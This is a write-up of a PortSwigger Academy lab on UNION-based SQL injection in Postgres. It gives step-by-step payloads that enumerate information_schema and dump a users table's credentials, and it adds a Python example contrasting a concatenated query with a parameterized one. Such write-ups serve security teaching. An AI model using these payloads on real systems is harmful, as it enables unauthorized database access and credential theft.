Write-up: SQL injection attack, listing the database contents on non-Oracle databases @ PortSwigger Academy

Frank Leitner
Jun 6, 2022

This write-up for the lab "SQL injection attack, listing the database contents on non-Oracle databases" is part of my walkthrough series for PortSwigger’s Web Security Academy.

Learning path: Server-side topics → SQL injection

Python script: script.py

Lab description

Query

The query used in the lab will look something like

SELECT * FROM someTable WHERE category = '<CATEGORY>'

Steps

The first steps are identical to the labs "SQL injection UNION attack, determining the number of columns returned by the query" and "SQL injection UNION attack, finding a column containing text" and are not repeated here.

As a result of these steps, I find out that the number of columns is 2, with both being string columns.

Find users table

The database in use here is Postgres (identified by injecting ' UNION SELECT null,version()--), which holds the table information in the information_schema.tables view. The relevant documentation lists the available columns; the one of interest is table_name. So inject ' UNION SELECT table_name, table_schema from information_schema.tables-- into the parameter to form the following query:

SELECT * FROM someTable WHERE category='X' UNION SELECT table_name, null from information_schema.tables--'

I use an invalid category so that no articles are found and only my output appears.

Enumerate columns in this table

The information_schema.columns view holds information about the columns of each table; the column of interest is column_name. The proper string to inject is ' UNION SELECT column_name, null from information_schema.columns WHERE table_name = 'users_kcstmf'-- to form this query:

SELECT * FROM someTable WHERE category='X' UNION SELECT column_name, null from information_schema.columns WHERE table_name = 'users_kcstmf'--'

Enumerate all usernames and passwords

Now we have all information to obtain the required usernames and passwords. Inject ' UNION SELECT username_spivdg, password_dfxmeh from users_kcstmf-- to form this query:

SELECT * FROM someTable WHERE category='X' UNION SELECT username_spivdg, password_dfxmeh from users_kcstmf--'

Now I simply log in to solve this exercise.
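The root cause and its fix, as an added example that is not part of the original write-up or the lab's code: the same category lookup built by string concatenation and with a bound parameter, both fed the final payload from the steps above. It assumes SQLite in place of Postgres so that it runs offline; the function names and sample rows are constructed.

```python
import sqlite3

# Constructed stand-in for the lab's schema. SQLite replaces Postgres so the
# example runs offline; table and column names follow the write-up.
def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE someTable (title TEXT, category TEXT);
        INSERT INTO someTable VALUES ('Gift card', 'Gifts'),
                                     ('Desk lamp', 'Lifestyle');
        CREATE TABLE users_kcstmf (username_spivdg TEXT, password_dfxmeh TEXT);
        INSERT INTO users_kcstmf VALUES ('administrator', 'constructed-secret');
    """)
    return db

def by_category_vulnerable(db, category):
    # The flaw the lab exercises: user input is spliced into the SQL text,
    # so a quote in `category` closes the literal and the rest runs as SQL.
    sql = "SELECT * FROM someTable WHERE category = '" + category + "'"
    return db.execute(sql).fetchall()

def by_category_safe(db, category):
    # Hardened form: the value is bound as a parameter, so the driver passes
    # it as data and the SQL parser never sees it.
    sql = "SELECT * FROM someTable WHERE category = ?"
    return db.execute(sql, (category,)).fetchall()

# Payload quoted from the write-up's last step, with the invalid category 'X'.
PAYLOAD = ("X' UNION SELECT username_spivdg, password_dfxmeh "
           "from users_kcstmf--")

if __name__ == "__main__":
    db = make_db()
    # Concatenated query: the UNION branch returns the credentials table.
    print("vulnerable:", by_category_vulnerable(db, PAYLOAD))
    # Bound parameter: the payload is just a category name that matches nothing.
    print("safe:", by_category_safe(db, PAYLOAD))
    # Legitimate lookups behave the same as before the fix.
    print("safe, real category:", by_category_safe(db, "Gifts"))
```

With a bound parameter the whole payload is compared against the category column as one string, so the UNION branch never executes.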

Originally published at https://github.com.
